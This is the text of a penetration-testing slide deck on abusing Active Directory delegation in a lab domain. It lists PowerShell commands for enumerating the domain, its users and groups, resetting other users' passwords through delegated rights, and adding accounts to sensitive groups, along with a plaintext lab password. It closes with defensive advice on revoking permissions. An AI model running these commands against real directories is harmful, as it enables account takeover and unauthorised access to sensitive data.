Active Directory
Delegation

“…Active Directory delegation is critical part of many
organisations' IT infrastructure. By delegating administration,
you can grant users or groups only the permissions they need
without adding users to privileged groups (e.g., Domain
Admins, Account Operators)…”*
* [source] http://windowsitpro.com/active-directory/view-remove-ad-delegated-permissions
AD Dele-What?

Requirements
• Windows Remote Administration Toolkit
https://www.microsoft.com/en-gb/download/details.aspx?id=45520
• Windows attacking host with Admin Privileges
• Patience and Enumeration Skills!

AD PowerShell Cmdlets
• Import the AD PowerShell module on the attacking host
• The attack box isn’t part of the victim domain, so the AD drive cannot load
$Env:ADPS_LoadDefaultDrive = 0
Import-Module ActiveDirectory

LDAP Overview
Terminology
• CN = Common Name
• OU = Organizational Unit
• DC = Domain Component
CN=bob,OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC
=rebootuser,DC=local

Exercise
We (most likely) need:
• User credentials of some sort…
Questions to ask:
• What’s the Domain name / Distinguished Name (DN)?

Enumeration
Get-ADDomain -Server 192.168.99.100 -Credential "rebootuserbob”
Redacted Output:
DistinguishedName : DC=rebootuser,DC=local
DNSRoot : rebootuser.local
DomainMode : Windows2012Domain
DomainSID : S-1-5-21-3305272636-1761470839-3168806703
Forest : rebootuser.local
InfrastructureMaster : DC-01.rebootuser.local:
NetBIOSName : REBOOTUSER
PDCEmulator : DC-01.rebootuser.local
RIDMaster : DC-01.rebootuser.local
SystemsContainer : CN=System,DC=rebootuser,DC=local
UsersContainer : CN=Users,DC=rebootuser,DC=local

Exercise
We have access to bob’s account
Questions to ask:
• Where does bob's account reside?
• Anything ‘interesting’ leaked from his account info?

Account Enumeration
Get-ADUser -Identity "bob" -server 192.168.99.100 -Credential
"rebootuserbob" -properties *
Redacted Output:
DistinguishedName :
CN=bob,OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=l
ocal
Description : 1st Line Support
HomeDirectory : DC-01Share$HomeBob

Exercise
Questions to ask :
• How is the LDAP environment structured?
• Where do user accounts reside?

Enumeration is Slow….
$username = "rebootuserbob"
$password = ConvertTo-SecureString "P@ssw0rd!" -AsPlainText -Force
$cred = new-object -typename System.Management.Automation.PSCredential -
argumentlist $username, $password
$diname = Get-ADOrganizationalUnit -Filter * -SearchBase
"dc=rebootuser,dc=local" -Properties canonicalname -server 192.168.99.100 -
Credential $cred | select distinguishedname; foreach ($i in $diname)
{write-output $i.distinguishedname; Get-ADUser -SearchBase
$i.distinguishedname -Filter * -Searchscope onelevel -server 192.168.99.100
-Credential $cred | Format-List SamAccountName}

Enumeration is Slow….
OU=Sales,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local
SamAccountName : sue
OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local
SamAccountName : bob
SamAccountName : jeff
OU=Management,OU=Users,OU=London,OU=UK,OU=Offices,DC=rebootuser,DC=local
SamAccountName : tim
OU=Marketing,OU=Users,OU=London,OU=UK,OU=Offices,DC=rebootuser,DC=local
SamAccountName : jimmy
OU=IT,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local
SamAccountName : godmode
OU=HR,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local
SamAccountName : sally

Exercise
We’ve identified a number of custom OU’s
Questions to ask :
• Do any users/groups hold delegation rights over any
OU’s within the environment?

Introducing ACL Scanner
• https://adaclscan.codeplex.com/
• OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local

Exercise
We’ve identified 2 groups:
• it_support_limited (some delegated rights) and
• it_support_priv (many delegated rights)
Questions to ask :
• Users that have membership of either group

Group Memberships
Get-ADGroupMember -Identity "it_support_limited" -server 192.168.99.100 -
Credential "rebootuserbob" | select ObjectClass, SamAccountName
Get-ADGroupMember -Identity "it_support_priv" -server 192.168.99.100 -
Credential "rebootuserbob" | select ObjectClass, SamAccountName

Exercise
OK, Bob (a member of “it_support_limited”) has the reset
password right over the Support OU
Questions to ask :
• Where does Jeff’s (or any other ‘useful’) account reside?

Abuse of Privilege…
• Looking at the previous enumeration results we see that Jeff is also in the support OU
OU=Support,OU=Users,OU=Cambridge,OU=UK,OU=Offices,DC=rebootuser,DC=local
SamAccountName : bob
SamAccountName : jeff
• Let's change his password!
Set-ADAccountPassword
'cn=jeff,ou=support,ou=users,ou=cambridge,ou=uk,ou=offices,dc=rebootuser,dc
=local' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "P@ssw0rd"
-Force) -Server 192.168.99.100 -Credential "rebootuserbob"
To cut a long story (and many, many more slides of enumeration) IT_support_limited has password reset
rights over the UK OU and child entities and IT_support_priv has all possible delegation rights over the entire
Offices OU and child entities

Exercise
Now we’ve inherited Jeff’s powerful delegation rights over
the entire Offices OU and sub entities!
Questions to ask :
• Are there any privileged accounts we can commandeer?

PWN all the Admins!
• From earlier recon we found an interesting user, godmode:
OU=IT,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local
• Which groups is godmode a member:
Get-ADPrincipalGroupMembership godmode -Server 192.168.99.100 -Credential
"rebootuserjeff" | select name
• Ah, excellent Jeff has delegation rights here, lets change the password….

AdminSDHolder & SDProp
• AdminSDHolder is a container that exists in
each AD domain
• A protected group is an Active Directory group
that is identified as a privileged group. This
group and all its members should be protected
from unintentional modifications*
• When an AD group is marked a protected
group; AD will ensure that the owner, the ACLs
and the inheritance applied on this group are
the same as the ones applied on
AdminSDHolder container*
* [source] https://social.technet.microsoft.com/wiki/contents/articles/22331.adminsdholder-protected-groups-and-security-descriptor-propagator.aspx

AdminSDHolder – Who/What/Eh?
Get-ADGroup -LDAPFilter "(admincount=1)" -Server 192.168.99.100 -Credential "rebootuserjeff" | Select
SamAccountName
Get-ADUser -LDAPFilter "(admincount=1)" -Server 192.168.99.100 -Credential "rebootuserjeff" | Select
SamAccountName

Needing Direction
• So where do we go from here?
• We have powerful delegation rights – we can change passwords, modify group memberships, add
groups/user etc.
• DA is not necessarily the end goal
• Sensitive data is likely to be stored in group drives:
• If we recall, Bobs home directory resides in the following location:
HomeDirectory : DC-01Share$HomeBob
• HR
• Finance
• IT
• Management
• …the list goes on

Exercise
There are many directions we could take…
Questions to ask :
• DA is off the table (for now), but are there any other
sensitive groups we can pwn?

Group Enumeration
• Automated group enumeration – I won’t bore you with the PS query!
OU=IT,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local
SamAccountName : IT_support_limited
SamAccountName : IT_support_priv
SamAccountName : it_users
SamAccountName : the_privileged_few
OU=HR,OU=Users,OU=NY,OU=USA,OU=Offices,DC=rebootuser,DC=local
SamAccountName : hr_users
• We (Jeff) have delegation rights here - let's add ourselves (bob) to this group!

Delegation Disaster!
DEMO

Final Thoughts
• Complex environments could easily faultier in delegation assignments
• Microsoft provide a nice wizard interface for assigning permissions…
….revoking permissions is not such a straight forward approach
• Often overlooked in pentests, but a prime target!
• Dsrevoke
• PowerShell
• ADUC > Advanced View > Security Tab